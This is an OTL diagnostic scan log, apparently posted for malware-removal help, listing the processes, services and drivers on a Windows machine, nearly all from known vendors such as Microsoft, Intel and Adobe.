Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Stopped] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Stopped] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Stopped] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
